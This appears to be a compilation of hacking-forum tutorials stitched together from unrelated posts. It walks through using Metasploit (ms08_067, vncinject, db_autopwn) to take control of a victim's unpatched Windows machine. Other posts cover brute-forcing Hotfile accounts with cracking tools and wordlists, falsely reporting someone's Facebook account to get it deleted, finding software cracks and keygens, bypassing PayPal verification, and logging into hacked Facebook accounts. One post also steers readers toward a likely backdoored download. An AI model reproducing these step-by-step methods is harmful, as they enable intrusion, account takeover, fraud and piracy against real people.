UNDERSTANDING METASPOILT HACKING- tutorial

NOTE: I'm not responsible for anything you do with this info!

I'll not go in deep to make this paper boring :)

Okay so let's begin!

First of all, you would be thinking what is Metasploit?
Metasploit is a framework which allow us to penetest the remote machine to see if its vulnerable to any exploit and if yes, then we can control that remote machine from our own computer.

How it works?
Metasploit works on 3 things -

1. Vulneribility
2. Exploits
3. Payloads

Okay, let me give you a real life example.

Just imagine there's a house which is locked, and a theif comes and if he tries 7-8 combinations of keys then he is able to crack that lock, and get into the house.

=>> Now this thing is called vulneribilty according to Metasploit.

Now the theif tries some combinations of keys and he is able to get into the house successfully.

=>> Now this is called exploit according to Metasploit.

Now it depends on the theif what he wanna do with the house, he can whether steal jwellery, money and any other item present in house. Basically the things that he do after getting in the house.

=>> Now this is called payload according to Metasploit.


Okay now let me explain you this in a hacker's language.

Just imagine you have found a vulnerable computer with XP sp2 as operating system. And there's a exploit available from XP sp2 already.

=>> So this is called vulneribilty.

Now you apply the exploit by providing victim's IP address and any open port.

=>> This is called exploit.

Now you need to send payload in his computer, there are many payloads available in Metasploit from which you can get a shell in victim's pc, capture his keystrokes, control his PC through remote desktop, upload and execute a .EXE file, etc many other things.

=>> This is known as payload.


Now the question is how to use Metasploit?

Hmm, Metasploit is available in two platforms - console (cmd) and GUI (graphical user interface).

Console is the best, so we'll go on it.

Metasploit has different commands for different things.

If you want to see exploit simply type = show exploits.
If you want to see payload, type = show payloads
After setting all options now type = exploit

Okay so now basics are cleared that how Metasploit works. Now lets move on to some higher level, which is hacking ;)

Suppose you have a victim who is running XP SP2 unpatched version, and you have his IP.

Now you need to open msfconsole.

Wait, let it load, it'll take sometime as it has more than 600 exploits and 200 payloads.

Now when it is loaded type cmd = db_driver sqlite3

=>> It'll load the database driver.

Now type = db_create

=>> It'll create a new database.

Type = show exploits

=>> It'll get the list of all exploits currently present in Metasploit database.

Now type = use [exploit name] (we'll use windows/smb/ms08_067_netapi exploits, as we are attacking a XP SP2 machine)

So type = use windows/smb/ms08_067_netapi

=>> It'll load the exploit. Usually all exploits are to be executed on a third party software's security hole. But this exploit is found in the windows XP's system file.

Now you need to select payload, type  = show payloads

=>> It'll show you all payloads currently in the database, now we'll use vncinject payload (payload cmd = set PAYLOAD [payload name].

So type = set PAYLOAD windows/vncinject/bind_tcp

Now type = show options

=>> It'll sort out all the options that you need to fill now.

To fill the option the cmd is = set [option name] [your selection(answer)]

You need to fill some options like RHOST, RPORT, LPORT, LHOST, etc. Fill them as I said.

RHOST (remote host) = Remote machine's IP (victim's IP)

To see victim's open port use Nmap to scan his IP and get the open ports. Now when you are done fill all options.

And at last type = exploit

=>> Bangggg! You are done! Now a new windows should be opened, it's like you are in the PC, you can control the whole PC :)


In this paper I'll explain:

1. How does the exploits work.
2. How to prevent your computer from being exploited.
3. How to use autopown function in Metasploit to hack a remote machine.


How does the exploits work?

Exploits are made by finding a security hole in a software. And then we can send our payload to perform different actions.
Exploit writers needs to have very deep knowledge of the software/program in which they are trying to find a security hole to prepare/write an exploit. Usually all exploits are to be executed on a third party software, as the security holes are found in those softwares. But there are also some exploits available to directly attack OS, means the security holes are found in a windows file.

How to prevent your computer from being exploited.

Almost 60% of operating systems are patched till date. And there's no exploit for Win 7 currently. Some anti-viruses can also block some hackers from exploiting your computer.
Though there are some things you can do to prevent your computer from being exploited:

1. Never run any unwanted link.
2. Never turn your AV off even when someone tells you to do so.
3. Don't share your IP with anyone.
4. If you know that the hacker has your IP address and if you have a dynamic IP, simply re-connect your internet connection.

These are some steps you can follow to prevent your computer from being exploited.

_________________________________

Now, I'll explain you how to hack a remote computer just by its IP address. By launching exploit on a third party software in victim's computer.

It  works 50% times.

Download latest Metasploit framework from its official site - www.metasploit.com
Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.

Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.

Now launch msfconsole.

It'll take sometime as it has more than 600 exploits and 200 payloads.

Type = db_driver sqlite3

=>> It'll enable the database driver.

Now type = db_create

=>> It'll create a database.

Type = nmap

=>> It'll load the Nmap up.

Now type = db_nmap -sT -sV [victim's ip address]

=>> It'll show the open ports of victim's machine.

Now finally type = db_autopwn -p -t -e

=>> Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC!


Voila! Now you can do anything with his PC!
                              

x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Now the white papers are over for Metasploit, now only tutorials will come >:D<

Again -  I'm not responsible for anything you do with this info!

If you have any questions, I'll try to best to help you!

Guaranteed Method to Hack a gmail account

first get a hacking tool no need to worry where to find just go to http://www.youtube.com and search "Runescape Hacker" or "Runescape Hacker Download Link"

you will get the downloading link in comments zone

now you have downloaded the hacker tool but -Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Safe area!

download and install hexworkshop now dont ask for link...google is your friend

now right click on tool ,,you will see "Edit this with HexWorkshop"...click it

you will see a mess of words and alphabets symbols....dont worry dont get confused believe me its easy to do!

now press ctrl+f... a boz will appear

-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.

-Now Enter "Gmail" to the Box and Hit "Find".

-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.

-Copy the Highlighted text and Paste it in a Text document (Newly Created).

-Remove the [.]>DOTs and You will see The Email ID + the Passwd.

Njoy Hacking!!

Increase your adsense earning : MUST READ

What is Adsense Revenue Sharing Program
This method is particularly useful for those people who dont have a running blog so couldn't get much through adsense.This method is called Adsense Revenue Sharing program.


Have already heard anything about Revenue Sharing Sites?Revenue Sharing Sites are sites which place ads (particularly from adsense) of its members throughout its website. The site ads and the member’s ads impressions will be divided according to the site’s rules. Revenue Sharing Sites can be a Social networking, Forum or Article Marketing Website.

Does it violate TOS of Adsense?As of now, I haven’t found any conflicts of this concept to the TOS of Adsense. If you are worried that this might be an illegal way of earning in adsense then as of now, it is not directly define in any sentences within the TOS of adsense. There are a lot of Revenue Sharing sites that exist for a very long time now. A very popular Revenue Sharing Forum Site is the DP or Digital Points. DP is doing this concept for how many days and months still, there are no reports from its members of getting suspended by adsense because of joining the site. Getting to Know Revenue Sharing Sites As I have said, this kind of site can be in form of forum, social networking or article submission site. Adsense, as we all know can pay you by the number of page impression who have made with their adsense placing on it. In a forum revenue sharing site, it works based on your activity. If you post messages on discussions or making your own discussions, everytime a visitor hits and read that page and your ads is currently in display, you have a great chance on earning from it. The key on this kind of forum sites is to be active and make discussions that are interesting. For social networking site, it works when someone view your profile. Some other sites would offer a random placing of ads on the top of their every page. For article submission sites, it works when someone view your article. The ads will match to the article that you have made, so the possibility of ads getting click by the reader is very high.


If you are an adsense user and you think that your blog or website traffic is not enough to make a good traffic to earn with your adsense, you may want to try on joining to this Revenue Sharing Sites.

Increase your adsense earning through revenue sharing

Step1. First of all create an account on www.yousaytoo.com

Step 2. During registration, they will ask for ur adsense ID, you will get this id from ur adsense account. It looks like this pub-32323433230230 . Just copy and paste it there.

Step 3. Now create a blog on yousaytoo.com and post more and more topics,whoever read ur blog and make click on the ads ,you will be rewarded in the adsense.

Its really easy way to earn as yousaytoo has huge traffic . I m earning 2-3 $ daily in this way.


How will i know how much i have earned ?
We don't have such information. You need to login to your Google AdSense and/or Amazon affiliate accounts to find out how much you've earned.


You can track your earnings from Google AdSense on YouSayToo by adding a new URL channel in your Google AdSense account. To do that, login to your AdSense account and go to AdSense Setup --> Channels then go to URL channels and add a new URL channel www.yousaytoo.com

All revenue sharing sites have their policies like some sites have 50% ads policy,which means if you have make a post on some revenue sharing site and there are 20 clicks on the ads then 10 goes to your account and 10 goes to the webmaster.
Some sites have 75% policy means 3 out of 4 are yours and some also have 100 % .

ENJOY..!  

Delete Any Facebook Account [ 100 % gauranteed ]

Here is a method to delete any facebook profile or account. It works 100%. But its just for educational purpose. So don't use it on anyone. Once Deleted Profile can never be recovered. Use wisely.

WHAT ALL U NEED ?

1. Victim's profile link ( you can get it easily )
2. His/Her Email which he/she uses to sign in
3. His/Her birth date which he/she has used in the profile
4. Make an Email ID on gmail or yahoo with the first name and last name same as on victim's facebook profile.

HOW TO DO IT

1. Go to this page:

http://www.facebook.com/help/contact.php?show_form=hack_nologin_access

2. Enter details. In the place of  ' email address where you can be contacted ' enter the fake email u created.

3. you will get a mail on that ID in which facebook people will ask your problem. Reply to them that you are XYZ( victim's name ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ' I am a girl and it poses threat to my social life ' and write anything you want that could make them take action. ( no need though in 100 % cases they delete the account )

4. After 2-3 days youu will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don't have access to it. And repeat what all you wrote in first mail.

5. Next Day or Same Day you will get an Email that your account is disabled.

ENJOY..!

Cracks, Serials or Keygens of Any Thing

Friends nw i am posting a new trick to gt keygens ,cracks,serials of any software by using CRAGGLE
if this thread already exist ...mods can delete

Enjoy:)

Craagle is a free downloadable standalone meta search engine that allows users to search every sort of cracks, serials, keys, keygen and covers, without falling into annoying toolbars, pop-ups, spyware, ad-ware and mal-ware that the crack sites or search sites abundant with. It works by doing the searching the cracks, serials or album covers directly from Craagle program without the need to visit the websites. Craagle has added advantage of able to search for cover images or graphics for CD, DVD, audio, games and etc.

Craagle also supports usage of proxy server to bypass some sites that have Day Limit or daily usage limit. Craagle source code has over 100,000 characters (engine only, excluded GUI).


How to install?

There is no need to install the program as the exe is portable and can be run without any kind of installation process. To run the program just double click the craagle.exe file. To download click here.

How to search for cracks, serials or keygen in Craagle?

The user interface of Craagle is as follows:

Follow the steps:

Type the name of the software.
Select whether you want crack, serial or keygen.
You may also select a specific website you want to search.
Press Search.
Select the version of the software.
Right click and press Download to get the Key.
The Key will be displayed at the bottom as shown in the above figure.
Activate the software using the given key and Enjoy

Crack Sites Supported:

Cracks
KeyGen
.AllCracks
Andr.
Crack.
Crackz.
CrackArchive
CrackDb
CrackzPlanet
CrackWay
MsCracks.
CrackPortal.
TheCracks.
KeyGen. Ru

Serial Sites Supported:

Seriall.
FreeSerials.
SerialSite

.
Serials
Andr.
SerialKey.
SerialArchive.
CrackzPlanet.
MsCracks.
CrackPortal.
KeyGen.
TheKeys.
FreeSerials.
FreeSerials.Spb.
Serial.220volt.
SerialCodes.

http://www.mandamais.com.br/download/?codigo=jer796200823479

  

How to verify your own PayPal widout a credit card

 

 

1. Make sure you have a PayPal account made. If you don't, go to www.paypal.com

2. Now go to Netspend.Com and click the big green "Open Account" button.

3. Fill out the info, for the address put in anything, could be your real one doesn't matter. They will send a card to that address most people will throw it out as junk mail if its a fake address.

4. Log in to your PayPal account. Hit the "Get verified" link (image provided)

5. When the new page comes up, hit "Add Bank Account".

6. Log into your Netspend account. Go to "Add Funds", then "PayPal Transfers".

7. Copy and paste the necessary info from the Netspend account to the PayPal Verification fields. Wait 3-5 days for the deposit.

8. Enjoy Spending!!

How to Crack Hotfile Accounts

Lets start with Hotfile which is the easiest to crack because Hotfile wont ban single IP.
 
Tools needed:-Elite Hotfile Cracker+Checker-Checks if the cracked account is Premium or just Regular while cracking.

-Hotfile Validity Scanner-This tool scans for valid Hotfile usernames so you dont go nuts trying a 28MB wordlist when theres less than 1000 valid HF users.
Tools needed are at the end.

1.You need a good wordlist.One good tip is to LEECH usernames from warez sites.They download games from the net so out of 10 usernames about 5 would have a premium account.You just need the correct password.
Dont forget extensions.

Theres lots of good wordlist on the net,you can google them.
Like American Names,Chinese Names,Nigg3r names wordlist etc.
Please dont ask me about the username leecher.
Please dont ask me whats an extension.

-------------

2.Passwords-Think of good passwords.There are many common passwords people use like:123456,qwerty,f*cker,pen1shead or something like that.
It just depends on your creativity.
Sometimes you might have the right wordlist but the wrong password or vice versa.



Please dont ask me what password i use.


-------------


3.Sockets-
Sockets = Number of connections.
More sockets = Faster connection = Cracker will tend to skip more often.The speed depends on your own connection too.Put mine at 20-30(usually 20 is the default number)


Screenshot

That's it for Hotfile.Now you're ready to crack accounts.
GOOD LUCK!

And yeah this tut is short.

New look but has almost the same function as the previous hotfile checker + cracker but with lesser options.
I would suggest putting the sockets at 5 - 10.

 

 Hotfile Validity Scanner

 http://hotfile.com/dl/32571777/8771fb5/Hotfile_Validity_Scanner.zip.html

Hotfile Cracker + Checker by Reaper
http://hotfile.com/dl/32571423/75adb33/Hotfile_Cracker__Checker-Reaper.zip.html


Hotfile Cracker + Checker 1.1
http://hotfile.com/dl/32571043/e764a0c/Hotfile_Cracker__Checker_1.1.zip.html

Password for the RAR files:
crackingforum.com/undiesman.html

How To Login Hacked Facebook Accounts

Many members wanted to use hacked facebook accounts.
But he/she can't because they get this message:

to bypass it we just have to login through the following link ;]

i.e.

http://www.facebook.com/login.php?api_key=afe4c25ae28531b4785fe2a9a54fd1fb&v=1.0&next=http%3A%2F%2Flb0.mw.production.monstergamesinc.com%2F&canvas=1

^

here it'll not ask for verification :)